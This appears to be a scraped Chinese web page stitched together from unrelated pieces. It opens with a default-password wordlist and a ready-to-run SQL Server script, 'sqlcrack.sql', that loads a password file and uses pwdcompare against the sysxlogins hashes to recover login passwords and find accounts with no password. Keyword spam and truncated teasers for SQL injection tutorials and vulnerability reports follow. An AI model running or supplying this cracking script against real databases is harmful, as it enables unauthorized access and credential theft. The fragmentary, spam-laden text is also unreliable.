把
password
sqlserver
sql
admin
sesame
sa guest
here is the script:
(sqlcrack.sql)
create table tempdb..passwords( pwd varchar(255) )
bulk insert tempdb..passwords from 'c:/temp/passwords.txt'
select name, pwd from tempdb..passwords inner join sysxlogins
on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1)
union select name, name from sysxlogins where
(pwdcompare( name, sysxlogins.password, 0 ) = 1)
union select sysxlogins.name, null from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid
where sysxlogins.password is null and
syslogins.isntgroup=0 and
syslogins.isntuser=0
drop table tempdb..passwords
——l love this game
關鍵字:軟體 伺服器 qq os msn dos 美女 電影 ** ** 無極 汽車 ***
SQL注射總結 5
通常注射的一些介紹 a id 49 這類注入的引數是數字型,sql語句原貌大致如下 select from 表名 where 欄位 49 注入的引數為id 49 and 查詢條件 即是生成語句 select from 表名 where 欄位 49 and 查詢條件 b class 連續劇 這類注入的...
SQL注射資料(翻譯)
1 介紹 2 漏洞測試 3 收集資訊 4 資料型別 5 獲取密碼 6 建立資料庫帳號 7 mysql作業系統互動作用 8 伺服器名字與配置 9 從登錄檔中獲取vnc密碼 10 逃避標識部分訊號 11 用char 進行mysql輸入確認欺騙 12 用註釋逃避標識部分訊號 13 沒有引號的字串 1 當伺...
URL編碼與SQL注射
說到url編碼,你或許會想起n年前的url編碼漏洞。可惜我是 生不逢時 啊,我接觸網路時,那個漏洞早就絕跡咯。言歸正傳,url 編碼是什麼東東呢?看看我從網上抄的定義 引用 url編碼是一種瀏覽器用來打包表單輸入的格式。瀏覽器從表單中獲取所有的name和其中的值 將它們以name value引數編碼...
大漢版通jvideo系統SQL注射
大漢版通jvideo系統sql注入可獲取系統使用者帳號密碼等。0x1 還是webservice的問題,情況類似 大漢版通jis統一身份認證系統sql注射漏洞 不得不說,根據我的經驗,國內基於j2ee的web應用系統帶webservice的一半以上都得在這出問題,而且都是簡單粗暴型的,題外話 jvid...
Discuz 某旗下產品多版本SQL注射漏洞
試了6.x 7.x 其他版本沒測試,應該也行的 batch.common.php 218 elseif action modelquote showxml html 在看看tname函式 function common.func.php 601 function tname name,mode 0 ...